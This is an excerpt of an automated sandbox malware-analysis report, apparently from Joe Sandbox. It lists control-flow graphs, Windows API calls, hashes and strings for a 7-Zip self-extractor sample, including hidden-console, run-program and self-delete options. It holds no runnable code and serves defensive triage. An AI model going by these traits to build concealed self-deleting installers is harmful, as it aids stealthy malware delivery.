d74cd0 1507->1515 1516 d64cf7-d64d03 1507->1516 1508->1479 1511->1492 1513->1514 1521 d64e4f-d64e5c 1513->1521 1530 d64e85-d64ea7 call d6b300 call d74cd0 1514->1530 1531 d64ea9 1514->1531 1515->1517 1516->1515 1522 d64d05-d64d11 1516->1522 1521->1514 1525 d64e5e-d64e67 1521->1525 1522->1515 1526 d64d13-d64d1d 1522->1526 1525->1505 1526->1515 1529 d64d1f-d64d31 call d74cd0 1526->1529 1529->1517 1530->1517 1531->1495
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00D62B43,00000000,00000000,?), ref: 00D64C3A
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D64C4A
                                                                                                                                                                • Part of subcall function 00D635B0: _DebugHeapAllocator.LIBCPMTD ref: 00D635C0
                                                                                                                                                                • Part of subcall function 00D635B0: wcsncpy.MSVCRT ref: 00D635E4
                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00D62B43,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D62B43,00000000), ref: 00D64D72
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00D62B43,00000000,00000000,?), ref: 00D64D7C
                                                                                                                                                                • Part of subcall function 00D6B300: wvsprintfW.USER32(?,?,?), ref: 00D6B32D
                                                                                                                                                                • Part of subcall function 00D6B300: GetLastError.KERNEL32 ref: 00D6B33D
                                                                                                                                                                • Part of subcall function 00D6B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00D6B36C
                                                                                                                                                                • Part of subcall function 00D6B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00D6B393
                                                                                                                                                                • Part of subcall function 00D6B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3A8
                                                                                                                                                                • Part of subcall function 00D6B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3BB
                                                                                                                                                                • Part of subcall function 00D6B300: ??2@YAPAXI@Z.MSVCRT ref: 00D6B3DC
                                                                                                                                                                • Part of subcall function 00D6B300: lstrcpyW.KERNEL32(?,?), ref: 00D6B404
                                                                                                                                                                • Part of subcall function 00D6B300: lstrcpyW.KERNEL32(?,?), ref: 00D6B437
                                                                                                                                                                • Part of subcall function 00D6B300: ??3@YAXPAX@Z.MSVCRT ref: 00D6B45F
                                                                                                                                                                • Part of subcall function 00D6B300: LocalFree.KERNEL32(?), ref: 00D6B46E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$AllocatorDebugFileFormatHeapMessageTimelstrcpy$??2@??3@AttributesErrorFreeLastLocalSystemwcsncpywvsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1540793163-0
                                                                                                                                                              • Opcode ID: cfa1840d2c75477dea20513b7155d1b01b34b071e90f504c79708656dae13ff0
                                                                                                                                                              • Instruction ID: 8c3d08459a5722a351750a616d3db1673fe6bb7b20d5271897f8ce08e79c26c7
                                                                                                                                                              • Opcode Fuzzy Hash: cfa1840d2c75477dea20513b7155d1b01b34b071e90f504c79708656dae13ff0
                                                                                                                                                              • Instruction Fuzzy Hash: DB815774E00219DBDB14CF99D991AFEB3B1FF48304F244518E802AB291EB74AE51DBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1617 d63c80-d63ca1 FindFirstFileW 1618 d63ca7-d63cba FindClose 1617->1618 1619 d63ca3-d63ca5 1617->1619 1621 d63cbc-d63cc7 SetLastError 1618->1621 1622 d63cc9-d63cd0 1618->1622 1620 d63d18-d63d1b 1619->1620 1621->1620 1623 d63cd2-d63cde call d63c30 1622->1623 1624 d63ce0-d63ce7 1622->1624 1623->1620 1626 d63d13 1624->1626 1627 d63ce9-d63cfc CompareFileTime 1624->1627 1626->1620 1628 d63d05-d63d11 call d63c30 1627->1628 1629 d63cfe-d63d03 1627->1629 1628->1620 1629->1620
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00D63C94
                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00D63CAB
                                                                                                                                                              • SetLastError.KERNEL32(00000010), ref: 00D63CBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseErrorFileFirstLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4020440971-0
                                                                                                                                                              • Opcode ID: 7f830b95bd1fd5dde7f2312c469819afa4b421b3f757ee068abd0c7f1e97c6d0
                                                                                                                                                              • Instruction ID: da8c8602b0f8633f9873a63a278ede06857a1ac00781502695802cbc5aa5e1cb
                                                                                                                                                              • Opcode Fuzzy Hash: 7f830b95bd1fd5dde7f2312c469819afa4b421b3f757ee068abd0c7f1e97c6d0
                                                                                                                                                              • Instruction Fuzzy Hash: 7611C075910208EBDB20DBA4EC09BAE7378AB44321F244664F856E72D0DB31DB84DFB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1633 d65080-d650a1 FindFirstFileW 1634 d650a3-d650a8 1633->1634 1635 d650aa-d650bd FindClose 1633->1635 1636 d650eb-d650ee 1634->1636 1637 d650df-d650e3 call d64ed0 1635->1637 1638 d650bf-d650cd SetFileAttributesW 1635->1638 1642 d650e8 1637->1642 1639 d650cf-d650d9 DeleteFileW 1638->1639 1640 d650db-d650dd 1638->1640 1639->1636 1640->1636 1642->1636
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00D65094
                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00D650AE
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D650C5
                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00D650D3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AttributesCloseDeleteFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3319113142-0
                                                                                                                                                              • Opcode ID: 73a6b5ddbb2a58c8aa8b536f8966eef8420a1dba177372e1696f27299a25d83b
                                                                                                                                                              • Instruction ID: cea54a729efbf6a810a24623c1ae120895f57b06331cac0c02ba4b7d32fe6e0d
                                                                                                                                                              • Opcode Fuzzy Hash: 73a6b5ddbb2a58c8aa8b536f8966eef8420a1dba177372e1696f27299a25d83b
                                                                                                                                                              • Instruction Fuzzy Hash: F5F0F475500B08EBCB10DF70EC88AEE7738AB44310F248654F94AD7284DA32DAC5DBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 d67530-d6755c ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z GetLastError GetTickCount 1 d6755e-d67569 GetTickCount 0->1 2 d67578-d67583 0->2 1->2 3 d6756b-d67576 GetTickCount 1->3 4 d67585-d67591 2->4 5 d67593-d6762e call d610d0 * 3 GetModuleHandleW GetProcAddress FreeConsole call d66680 GetCommandLineW call d638f0 call d61d50 call d64320 call d612d0 call d66d00 2->5 3->2 3->5 4->2 24 d67662-d67681 call d635b0 GetModuleFileNameW 5->24 25 d67630-d6765d call d67310 call d74cd0 * 3 5->25 31 d67683-d676b7 call d6b300 call d74cd0 * 3 24->31 32 d676bc-d676de call d63580 call d66d00 24->32 51 d683ec-d683f0 25->51 31->51 47 d676e0-d67708 call d74cd0 * 3 32->47 48 d6770d-d6773f call d62370 * 2 call d65be0 32->48 47->51 65 d67745-d6779e call d616c0 call d612d0 call d61d50 call d612d0 call d61d50 call d79600 48->65 66 d677f0-d6781a call d661c0 call d61d50 call d612d0 call d611c0 48->66 96 d677a0-d677a9 call d616c0 65->96 97 d677ae-d677eb call d62370 call d65e70 call d79450 call d612d0 * 2 65->97 84 d67860-d67892 call d63b10 call d68790 call d68480 call d661f0 66->84 85 d6781c-d6785b call d612d0 call d6b300 call d74cd0 * 3 66->85 112 d67894-d678c3 call d74cd0 * 4 84->112 113 d678c8-d678e0 call d66d00 84->113 85->51 96->97 97->66 112->51 125 d678e6-d678ef 113->125 126 d679b1 113->126 130 d678f1-d678f7 125->130 131 d678fa-d67902 125->131 129 d679b8-d679be 126->129 136 d67a06-d67a20 call d68540 call d61760 129->136 137 d679c0-d67a04 wsprintfW call d65e70 call d636c0 129->137 130->131 132 d67904-d6790d 131->132 133 d6791a-d67922 131->133 132->133 138 d6790f-d67918 132->138 140 d67924-d67939 call d66ab0 133->140 141 d6797c-d679ac call d74cd0 * 4 133->141 159 d67a57-d67a66 call d66dc0 call d61230 136->159 160 d67a22-d67a52 call d74cd0 * 4 136->160 137->129 138->131 140->141 157 d6793b-d67977 call d6b300 call d74cd0 * 4 140->157 141->51 157->51 178 d67a6d-d67a85 call d64c00 159->178 160->51 187 d67a87-d67aaa call d616a0 call d64a20 178->187 188 d67b02-d67b0e call d66880 178->188 201 d67aac-d67ab7 call d74cd0 187->201 202 d67ab9-d67afd call d616c0 call d612d0 call d636c0 call d74cd0 187->202 197 d67b10 188->197 198 d67b1a-d67b29 call d68520 188->198 197->198 206 d67b2f-d67b45 call d64c00 198->206 207 d67bb8-d67bc7 call d684e0 198->207 201->188 202->178 215 d67b47-d67b51 call d65e70 206->215 216 d67b54-d67bb3 call d68430 call d697f0 call d68460 call d74cd0 * 4 206->216 218 d67bdb-d67bfb CoInitializeEx call d64c00 207->218 219 d67bc9-d67bd5 207->219 215->216 216->51 230 d67c12-d67c1c call d66800 218->230 231 d67bfd-d67c0b call d61d50 218->231 219->218 239 d67c1f-d67c35 call d64c00 230->239 231->230 245 d67cc2-d67cd9 call d610d0 call d684c0 239->245 246 d67c3b-d67c4a call d684e0 239->246 262 d67df3-d67e04 call d638d0 245->262 263 d67cdf-d67ce9 call d684a0 245->263 246->245 255 d67c4c-d67c60 call d6b070 246->255 265 d67c97-d67ca8 GetKeyState 255->265 266 d67c62-d67c92 call d74cd0 * 4 255->266 273 d67e06-d67e17 call d64c00 262->273 274 d67e2a-d67e37 call d638d0 262->274 272 d67cef-d67d23 call d61d50 call d61c50 call d612d0 call d64c00 263->272 265->245 269 d67caa-d67cbd call d61b80 call d61ba0 265->269 266->51 269->245 315 d67d77-d67d92 272->315 316 d67d25-d67d72 call d612d0 call d6b300 call d74cd0 * 5 272->316 273->274 288 d67e19-d67e26 call d61d50 273->288 289 d67e59-d67e68 call d684c0 274->289 290 d67e39-d67e4a call d64c00 274->290 288->274 303 d67f05-d67f14 call d638d0 289->303 304 d67e6e-d67e7d call d684e0 289->304 290->289 306 d67e4c-d67e54 call d61d50 290->306 317 d67f16-d67f22 call d63790 303->317 318 d67f49-d67f78 call d62c60 call d66800 call d638d0 303->318 304->303 314 d67e83-d67e95 304->314 306->289 314->303 320 d67e97-d67eae call d6b200 314->320 321 d67da6-d67db2 315->321 322 d67d94-d67da0 315->322 316->51 330 d67f27-d67f47 call d62370 call d74cd0 317->330 355 d67f7a-d67f86 call d62370 318->355 356 d67f8b-d67f98 call d74cd0 318->356 320->303 339 d67eb0-d67eb9 320->339 327 d67dc6-d67dd2 321->327 328 d67db4-d67dc0 321->328 322->272 322->321 335 d67de6-d67dee call d61d50 327->335 336 d67dd4-d67de0 327->336 328->272 328->327 354 d67f9d-d67fbb call d612d0 call d6d910 330->354 335->262 336->272 336->335 344 d67ebb-d67ec3 call d74cd0 339->344 345 d67ec8-d67f00 call d74cd0 * 5 339->345 344->239 345->51 372 d67fdd-d67ff0 call d6d910 call d616c0 354->372 373 d67fbd-d67fdb call d612d0 call d6d910 354->373 355->356 356->354 388 d67ff5-d68004 call d684e0 372->388 373->372 373->388 391 d68006-d6800f 388->391 392 d68015-d68029 call d63050 388->392 391->392 395 d6806d-d68081 call d66880 call d68500 392->395 396 d6802b-d68068 call d674e0 call d74cd0 * 5 392->396 405 d68092-d680b7 call d610d0 * 2 call d684c0 395->405 406 d68083-d6808c 395->406 396->51 441 d680c8-d680d5 call d638d0 405->441 442 d680b9-d680c5 call d61cc0 405->442 406->405 408 d682a7-d682ae 406->408 413 d682b0-d682bf call d684e0 408->413 414 d682cb-d682d2 408->414 413->414 429 d682c1 413->429 415 d682d4-d682ea call d64c00 414->415 416 d68331-d68340 call d68500 414->416 415->416 430 d682ec-d682f6 415->430 432 d683b4-d683e6 call d74cd0 * 5 416->432 433 d68342-d68352 416->433 429->414 439 d68302-d6832c call d68400 call d697f0 call d68460 430->439 440 d682f8 430->440 432->51 435 d68354-d6835b 433->435 436 d6835f 433->436 443 d68361-d68378 call d62c60 call d68570 435->443 444 d6835d-d68390 call d64c00 435->444 436->432 439->416 440->439 455 d68202-d6822c call d684a0 call d612d0 * 2 call d62390 441->455 456 d680db-d680e4 441->456 442->441 443->432 444->432 473 d68392-d6839b 444->473 499 d68231 455->499 462 d68200 456->462 463 d680ea-d6815c call d791a0 * 2 call d612d0 call d61d50 call d704f0 * 2 call d612d0 GetFileAttributesW 456->463 468 d68234-d6828c call d66880 call d684a0 call d671c0 call d612d0 SetCurrentDirectoryW call d684a0 call d671c0 call d674e0 462->468 516 d681c2-d681fb call d612d0 call d616a0 call d61f80 call d74cd0 463->516 517 d6815e-d681bd call d674e0 call d6b300 call d74cd0 * 7 463->517 518 d68291-d682a2 call d74cd0 * 2 468->518 473->432 479 d6839d-d683b1 call d62c60 call d68570 473->479 479->432 499->468 516->462 517->51 518->408
                                                                                                                                                              APIs
                                                                                                                                                              • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00D6753F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D67548
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00D67551
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00D6755E
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00D6756B
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D675C5
                                                                                                                                                              • GetProcAddress.KERNEL32(?,FreeConsole), ref: 00D675D7
                                                                                                                                                              • FreeConsole.KERNELBASE ref: 00D675E0
                                                                                                                                                              • GetCommandLineW.KERNEL32(?), ref: 00D675EC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D675FF
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,?,?,00000000), ref: 00D67679
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D67717
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D67726
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6776A
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D67786
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D677B8
                                                                                                                                                                • Part of subcall function 00D66D00: lstrlenW.KERNEL32(?), ref: 00D66D5E
                                                                                                                                                                • Part of subcall function 00D66D00: lstrlenW.KERNEL32(?), ref: 00D66D6B
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D677FB
                                                                                                                                                              • wsprintfW.USER32 ref: 00D679D2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap$CountTick$Modulelstrlen$?_set_new_handler@@AddressCommandConsoleErrorFileFreeHandleLastLineNameProcwsprintf
                                                                                                                                                              • String ID: $7ZipSfx.%03x$AutoInstall$BeginPrompt$Delete$ExecuteFile$FinishMessage$FreeConsole$HelpText$InstallPath$RunProgram$SelfDelete$SetEnvironment$SfxString%d$Shortcut$d$kernel32.dll$sfxconfig$sfxtest$sfxversion
                                                                                                                                                              • API String ID: 313208911-2568464168
                                                                                                                                                              • Opcode ID: 9c7d181ffbb1030c1d0ed82a58011b047535aa162cfa89a6f4774cbe325b888b
                                                                                                                                                              • Instruction ID: 80ef4a95ee8e811e18167f50b4a4a59576c56eef556c1bb9ea60d005e23661b2
                                                                                                                                                              • Opcode Fuzzy Hash: 9c7d181ffbb1030c1d0ed82a58011b047535aa162cfa89a6f4774cbe325b888b
                                                                                                                                                              • Instruction Fuzzy Hash: 6C825C70D102099BDB15FBA9EC56AEE7375EF14308F548068F00AA62D2EF746A49CF71
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 578 d61f80-d61fcd call d610d0 call d63520 call d66850 call d612d0 587 d61fd0-d61fd7 578->587 588 d61fdd-d61ff7 call d662e0 587->588 589 d62109-d6210f 587->589 599 d6200a-d62024 call d662e0 588->599 600 d61ff9-d62008 588->600 591 d62183-d62196 call d62370 call d79450 589->591 592 d62111-d6211a 589->592 607 d6219b-d621db call d610d0 call d612d0 call d638f0 call d616a0 call d66850 call d61df0 591->607 595 d62144-d6214b call d61d50 592->595 596 d6211c-d62142 call d61d50 call d79450 * 2 592->596 605 d62150-d62166 call d64c00 595->605 596->605 612 d62026-d6202d 599->612 613 d6204c-d62066 call d662e0 599->613 600->587 619 d62181 605->619 620 d62168-d6217c call d79450 * 2 605->620 649 d621e1-d621e9 607->649 650 d6231c-d62346 call d74cd0 * 2 call d63670 call d74cd0 607->650 617 d62044-d6204a 612->617 618 d6202f-d6203f _wtol 612->618 628 d62080-d6209a call d662e0 613->628 629 d62068-d6207b 613->629 617->587 618->617 619->607 620->619 635 d620b4-d620c7 call d66420 628->635 636 d6209c-d620af 628->636 629->587 642 d620db-d620ee call d66490 635->642 643 d620c9-d620d6 635->643 636->587 651 d62102 642->651 652 d620f0-d620fd 642->652 643->587 653 d6220c-d6221f call d66850 649->653 654 d621eb-d621f2 call d79450 649->654 675 d6234c-d6234f 650->675 651->589 652->587 666 d62317 call d61d70 653->666 667 d62225-d62296 call d791e0 call d791a0 call d79160 call d612d0 call d616a0 call d704f0 * 3 call d612d0 call d61e40 653->667 660 d621f7-d621ff 654->660 660->653 663 d62201-d6220a 660->663 663->660 666->650 692 d6229b-d622a0 667->692 693 d622a2-d622aa call d74cd0 692->693 694 d622ac-d622b5 692->694 693->666 695 d622b7-d622c2 GetLastError 694->695 696 d622c4-d622d6 call d612d0 call d6b300 694->696 695->696 698 d622d9-d62310 call d674e0 call d74cd0 * 3 call d63670 call d74cd0 695->698 696->698 698->666 698->675
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D63520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00D61FB2,?), ref: 00D63541
                                                                                                                                                                • Part of subcall function 00D63520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00D63564
                                                                                                                                                              • _wtol.MSVCRT(?,?,?,?,?,?,?,?), ref: 00D62036
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D62124
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6214B
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6218A
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D621BC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D62268
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap$CurrentDirectory$_wtol
                                                                                                                                                              • String ID: ExecuteParameters$del$hidcon$shc
                                                                                                                                                              • API String ID: 1551080378-796110186
                                                                                                                                                              • Opcode ID: 9eb89ff4a6468e89e1625d55bd01619ed2bc441c34b6204cb2c070719e8b640d
                                                                                                                                                              • Instruction ID: f9b35e2d786aacf10ec321f1612ee83fa9d7db9375e4887a7a19681bd7084e2e
                                                                                                                                                              • Opcode Fuzzy Hash: 9eb89ff4a6468e89e1625d55bd01619ed2bc441c34b6204cb2c070719e8b640d
                                                                                                                                                              • Instruction Fuzzy Hash: C6B19EB5D002099BDB04EFA1DC66AFEB774FF14304F188528E416A7291EB74A909CFB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 763 d62640-d62650 764 d62652-d62657 763->764 765 d6265c-d62669 763->765 766 d62c54-d62c57 764->766 767 d62672-d626a0 call d79ef0 call d632c0 call d62c80 765->767 768 d6266b-d6266d 765->768 775 d626a2-d626b3 call d632f0 767->775 776 d626b8-d626c6 call d610d0 767->776 768->766 775->766 781 d626d1-d626f7 call d74cd0 call d632f0 776->781 782 d626c8-d626cf 776->782 781->766 782->781 783 d626fc-d6275d call d61d50 call d79160 call d612d0 call d61d50 call d704f0 call d632c0 call d62c80 782->783 803 d6275f-d62786 call d632f0 call d74cd0 call d632f0 783->803 804 d6278b-d62791 783->804 803->766 805 d62793-d6279d 804->805 806 d6279f-d627a6 804->806 808 d627ea-d62805 call d62c80 805->808 809 d627e1-d627e7 806->809 810 d627a8-d627dc call d632f0 call d74cd0 call d632f0 806->810 818 d62807-d6282e call d632f0 call d74cd0 call d632f0 808->818 819 d62833-d6285e call d62c80 808->819 809->808 810->766 818->766 830 d62860-d62887 call d632f0 call d74cd0 call d632f0 819->830 831 d6288c-d6289d 819->831 830->766 832 d6289f-d628a6 831->832 833 d628aa-d628c5 GetLocalTime SystemTimeToFileTime 831->833 838 d628c7-d628d6 832->838 839 d628a8-d6290c call d632f0 call d74cd0 call d632f0 832->839 840 d62911-d62918 833->840 838->840 839->766 844 d6291a-d62930 call d612d0 call d64c30 840->844 845 d62998-d629c0 call d612d0 call d63c80 840->845 862 d62932-d62966 call d632f0 call d74cd0 call d632f0 844->862 863 d6296b-d62993 call d632f0 call d74cd0 call d632f0 844->863 864 d629c2-d629c9 845->864 865 d629fa-d62a35 GetLastError call d632f0 call d74cd0 call d632f0 845->865 862->766 863->766 869 d629cd-d629f5 call d632f0 call d74cd0 call d632f0 864->869 870 d629cb-d62a51 ??2@YAPAXI@Z 864->870 865->766 869->766 877 d62a66 870->877 878 d62a53-d62a64 call d62cc0 870->878 886 d62a70-d62a9f call d6d770 call d612d0 call d63350 877->886 878->886 909 d62aa4-d62aa9 886->909 910 d62aaf-d62ada GetLastError call d62c60 call d65be0 909->910 911 d62c08-d62c4e call d63310 call d789b0 call d634f0 call d632f0 call d74cd0 call d632f0 909->911 920 d62adc-d62b24 call d74cd0 call d634f0 call d632f0 call d74cd0 call d632f0 910->920 921 d62b29-d62b48 call d616c0 call d612d0 call d64c30 910->921 911->766 920->766 941 d62b93-d62bb1 call d612d0 call d63350 921->941 942 d62b4a-d62b8e call d74cd0 call d634f0 call d632f0 call d74cd0 call d632f0 921->942 955 d62bb3-d62bfe GetLastError call d74cd0 call d634f0 call d632f0 call d74cd0 call d632f0 941->955 956 d62c00-d62c03 call d74cd0 941->956 942->766 955->766 956->911
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                              • Opcode ID: e3c531cabf71a6d65c9c7800923e1f3d134c6579e57f665a000b16c44446810c
                                                                                                                                                              • Instruction ID: 8d4a8f54d8eae321505a0fb23c23f21a1509cb7ad2dcc23953e784b265ccca8e
                                                                                                                                                              • Opcode Fuzzy Hash: e3c531cabf71a6d65c9c7800923e1f3d134c6579e57f665a000b16c44446810c
                                                                                                                                                              • Instruction Fuzzy Hash: BB12FC70910218DFDB18EF95C8A2AEDB775FF58304F148158E50AAB291EB30AE95CF71
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
